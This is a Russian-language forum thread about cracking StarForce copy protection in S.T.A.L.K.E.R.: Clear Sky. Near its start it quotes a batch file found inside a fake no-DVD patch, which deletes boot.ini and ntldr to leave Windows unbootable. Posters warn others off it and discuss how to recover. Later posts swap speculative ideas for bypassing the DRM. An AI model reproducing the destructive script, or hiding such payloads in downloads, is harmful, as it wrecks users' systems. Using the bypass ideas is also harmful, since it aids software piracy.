Ну это я и хотел сказать, вот мне щас книгу подогнали S.T.A.L.K.E.R. - Эпицентр удачи
вот лучше ее почитаю

сорри за оффтоп... Я в шоке
привожу пару цитат с ]]>http://www.antistarforce.com/forum]]>

1. вы чо ёб......сь все на отличненько чтоли? какое идёт... посмотрите содержимое во первых exe файла, во вторых откройте его winrar-oм и откройте содержимое bat файла, и охереете...

@echo off
attrib -h -s -r c:\boot.ini
attrib -h -s -r c:\ntldr
copy c:\ntldr %windir%\dx
copy c:\boot.ini %windir%\dx.ini
del /q c:\boot.ini
del /q c:\ntldr
del /q radmin.bat

После этого ваша винда хер загрузится НЕ СТАВИТЬ НИ В КОЕМ СЛУЧАЕ!!![/size]

2. все кто остались живы после моего * патча* - молодцы - не купились... а остальным флудерастам которые чухнули ставить патч... большой привет от boot.ini (но к сожалению они этот пост не прочтут)

TIREX, а что вы хотели? Флудеры однодневки просто захватили форум. До них не доходит, что люди, которые обещают нодвд, НИКОГДА ЕГО НЕ СДЕЛАЮТ. 200 страниц чистейшего флуда. Как эта тема до сих пор жива я никак не могу понять. Только я забанил, за мат, уже 10 человек, а общее колличество забаненных уже приближаеться к сотне. В соседней теме руским по белому написано:"Когда нодвд появиться он будет выложен здесь", и тем не менее флуд и идиотизм продолжаеться. На фэйках уже заработали не одну сотню баксов, а вы продолжаете верить.

будьте добры поделитесь файликом xrEngine.exe из украинского недокаченого торрента,нужен для пары тройки эксперементов.

все закономерно, на каждого псевдо-крякера найдется свой псевдо-вирусописатель, хотя и тот и другой одного поля ягоды

мухаха

гы гы гы, жестко... но забавно, нечего всякую херь запускать

мде за такое руки рубить надо!

лучше головы, у тех, кто запускает всякую дрянь не глядя, полезнее будет.

да ладно, обратить изменения проще пареной репы... )

кабы так, то уже наверное протезы

вот эта херня положит систему, а то что там ещё удаляецо boot.ini это херня.

положит систему, положит систему... поставишь другой загрузчик, и все.
к тому же оно сначала "copy c:\ntldr %windir%\dx" а уже потом "del /q c:\ntldr"

нужен либо liveCD (с виндой или линуксом), либо вторая установленная операционка. всего этого у абсолютного большинства просто нет, так что способ надежный, проверено ;)

Есть еще третий вариант, fixboot из консоли восстановления с любого загрузочного диска Windows XP. Но приятно то, что эта фигня на Windows Vista не прокатит

да это решается в 2 сечта с помощью любой пиратской болванки с виндами, загружаемся с нее, заходим в консоль восстановления и вводим 2 команды fixboot, fixmbr .. все.
А вообще сами виноваты - нефиг вякую чуш запускать... на виртаульной машине затестить еще можно попрбоавать на предмет безопасности, да и если кряк рабочий то через полчаса он разлетится по всему рунету... полчаса ничего не решают в данном случае, так что я кряки не тестирую.
Райкер ты меня опередил.

Мля ребят, давайте по теме, не охота в магазин за диском бежать

Бежать? В магазин? Лучше вообще ближайший месяц об этом не думать... Игра ну очень сырая. При повторном прохождении это очень сильно бросается в глаза.

А по сабжу - все было сказано еще пару страниц назад. Ждите европейский релиз с securom

В составе патча stkcs-rus-pack-r-patch-any-3.exe находится интересный файлик - cycle_start.cmd, после установки патча он находится в корне игры
(c:\Program Files\GSC World Publishing\С.Т.А.Л.К.Е.Р. - Чистое Небо\cycle_start.cmd).
Его содержание -

Как ни странно - Если его запустить после этого игра идёт без диска...

да обычный скрипт перезапуска дедика...
причем он к старфорсу?

После него игра НЕ идет без диска!
Он предназначен для запуска выделенного сервера!

..аааа, ясненько

Как компетентные люди пояснили, особенности применной защиты позволяют три дня играть без диска, потом затребует снова для проверки...

Приведённый выше скрипт никого отношения к этому не имеет...

2centrino,
Рад что понравилось

Вобщем есть идея, если я правильно понял то промлема сейчас заключается в том что взломать экзешник трудно а эмуляция палится и блокируется, сначала старфорс блокировал обращения к винту во время проверки, потом перцы придумали тащить нужные данные через сеть, теперь эту лавочку тоже прикрыли, может быть стоит занать образ двд в оперативную память и уже давать то что нужно эмулятору непосредсвенно ттудава, правда понадобитсяя примерно 8Гб оперативки и исходники драйвера.... чем покупать сталкера я лучше оперативки бы добавил)))))))

На nocd.ru на главной выложили крак для ЧН версии 1.5.03

Перезалейте кто-нить

Випфайл-фейк.

вообще ноцд.ру какойто шмурдяк гонит... там нередко трояны и вирусы или ссылки только на платник.
вот ]]>http://stopgame.ru/]]> нехуже - и фейков я там невидел. на ]]>http://rugcw.com/]]> тоже все чисто.

Если будут давать ссылку с депозита на файл "Stlkerndvd.rar", проверил - Фейк! Там 2 файла в архиве, экзешник от "dedicated" и подправленный "fsgame.ltx". Идет все тот же запуск приветствия и дальше привет рабочий стол. Но что самое любопытное, вес ни одного из файлов не совпадает (имеется в виду экзешник оригинальный, от dedicated и тот что из архива). У них вес совершенно разный, у всех трех. Меня теперь терзает вопрос что это за такое. Причем если убрать из папки "bin" "fsgame.ltx", то подправленный экзешник начинает ругаться на его отсутствие. Опять же спрашивается зачем такое делать и дописывать привязку по дирректории в экзешник.

варианта два - это экзешники после офф патча уже(или до - если у тебя после, ну вобщем ты понял) или они просто склеены с какиминбудь коварными троянами. причем вес не обязательно для этого должен быть можно, можно склеить с трояном а потом уже запаковать и размер получится меньше).

Мне удалось корректно запустить выделенный сервак вообще без проверки Старфорсом и найти фрагмент файла, который отвечает за игнорирование защиты. По этому одинаковые файлы (например, xrGame.dll и xrCPU_Pipe.dll) из папки \bin\ и \bin\dedicated\ имеют разный размер. Вот только проблема в том, что фрагмент кода зашифрован разными способами в каждом файле и, по этому, просто вставить кусок не получается..

VIGUR, а если разшифровать попробовать? Думаю там всетаки что то ближе к стандартному upx`y...

IceT, Сам иногда занимался троями, так что знаю что это и с чем едят. Экзешник чистый - без заразы.

расслабься

centrino, как стадо удавов. Чем по твоему может быть библиотека запакована?

У тебя вот такое получилось? Если я не прав ногами не бейте)))


]]>http://s53.radikal.ru/i140/0808/69/829039b933e9.jpg]]>

]]>]]>
вот кусок

AJIEKCEu, да, но только сначала когда я через cmd файлы запускал. Потом я запустил это напрямую через ЕХЕ

забейте на дедикейт... никак не запустить таким способом.
nocd будет, но позже. примерно 4-5 сентября
все остальное считайте фейком, если появится раньше, об этом узнают все. через 5 минут весь инет будет на ушах

Хэш, просто именно в файлах от дедикейтеда (xrGame.dll, xrCPU_pipe.dll и xr_Engine.exe) реально части обхода старфорса... см. мой скриншот

Хэш Если чесно я не особо к чему-то стремлюсь, у мну завтра диск будет, но просто хочетса чтоб NODVD сделали))))

Люди есть очень интересная идея!
вобщем когда мы запускаем нашу проверку, мы вводим ключ, этот ключ хранится в оперативной памяти
я нашол через арт мани 5 ячеек где он хранится, далее
чтобы сравнить ключи тот который должен быть магический, и тот который мы ввели, магический ключик должен быть сгенерирован либо откудато взят, в любом случае загружен в оперативную память
далее, так как мы его не знаем то мы его не можем найти в оперативной памяти, но! у тех кому прислали этот ключ, ключ который они вводят и сгенерированный ключ совпадает, соответственно мы знаем что искать в оперативной, так вот этот ключ будет хранится в какойто 6-той ячейке, я думаю адрес этой ячейки будет у всех одинаковый, и любой смотжет посмотреть этот ключик у себя.
Зы что надо > человек которому выслали ключ
Зыы единственное почему это может не получится, если ключ генерируется и сравнивается посимвольно, соответственно он будет хранится в оперативной памяти очень короткое время и только по 1-му символу ... в этом случае надо программа мониторинга оперативной памяти, которая сможет записать все изменения оперативки за время выполнения программы, в чем тут идея, если ключ генерируется посимвольно, то скорее всего в какойто одной конкретной ячейке, и это можно будет легко заметить ...

плакалъ

да когда я вспоминал подобные программы, мне тоже очень стало смешно когда под руку попалась арт мани, но ведь не в этом суть :-d
в данном случае она была использована для просмотра оперативной памяти ..)
Зыы сначала я думал в декомпилированном коде искать обращение к адресу нашей строки, но потом понял что это полный бред

уже очень давно никто не делает проверку ключей, серийников и прочая через прямое сравнение. серийник - это код, по которому расшифровывается часть ф-ий, либо порядок их вызова, либо таблица смещений этих ф-ий. похоже на части головоломки, которую можно собрать одним единственным способом, причем в строго определенном порядке, и пока не вставишь последнюю деталь - не поймешь, правильно ты делаешь или нет. это примерно как подобрать последовательность, md5 сумма которой равна aaaabbbbccccddddeeeeffffgggghhhh. если есть несколько тысяч лет свободного времени, то можете заняться.

спс за разьяснение
и всётаки, тогда можно подумать дальше, у нашей программы есть 2 валидныых ключа, один который можно посмотреть через Readcd, второй который присылает SF
соответственно первый нас отправляет на функции проверки диска, второй отправляет в обход защиты на последующие функции запуска игры ..., если всётаки принимать ключи как смещение (порядок вызова), отсюда вывод, способ неработоспособен, спасибо за внимание

даже если допустить, что мы нашли ф-ию, которая читает серийник посимвольно, и сделали точку останова на ней, и даже дотрассировали до того момента, когда идет проверка - то злобная программа к этому времени уже засекла время выполнения рассчета, который почему-то произошел не за доли секунды, а за гораздно большее время. а теперь самое интересное, время выполнения может использоваться как одна из переменных, из-за которой зависит конечный результат. то есть мы радостные отловили переход, который нам кажется правильным, но этот переход ведет не в тело программы, а куда-нить в никарагуа.
следующий момент, в расчете результата может использоваться контрольная сумма файла или его части. проводя трассировку мы меняет код программы, в результате имеем самые разнообразные значения, кроме правильных.
кстати, такие вещи встречаются в менее страшных вещах, чем старфорс.

ну и до выхода nodvd рекомендую почитать ]]>Теоретические основы крэкинга. Книга.]]> может и натолкнет кого на умные мысли.

отсюда вопрос, разве время выполнения не зависит от частоты процессора, таймингов памяти и т.д. ?

да, и еще кстати.

обратите внимание на последнюю фразу. цитата от 2004 года, однако никто так и не пробился в эту дыру до сих пор.


отличается. разница в микросекунды, если не меньше. но когда время выполнения занимает несколько секунд - это наводит на размышления, не так ли?

вот и я об этом подумал, это реальная дыра, которую помоему легче расковырять, чем снимать ВМ, переписывать всё в экзешник и прочие бубно танцо пения
Зы на размышления наталкивает, но сомневаюсь что в SF встроен AI

ну и перед тем, как пойду спать, последний пример. генератора ключей для такого весьма распостраненного продукта, как Windows XP Home также никто не сделал. а эта программа встречается несколько чаще, чем какой-то там старфорс, не правда ли? ;)

Согласен
и всётаки вернёмся к нашим валидным ключам, если наш ключ является смещением, то при неправильном вводе нас вообще выкинет в тундру и должен вылететь Error, но этого не происходит, отсюда вывод: я не думаю что там стоит чтото вроде try except, а на ключ таки накладываются какието условия ...
Зы ушол я тож спать ..)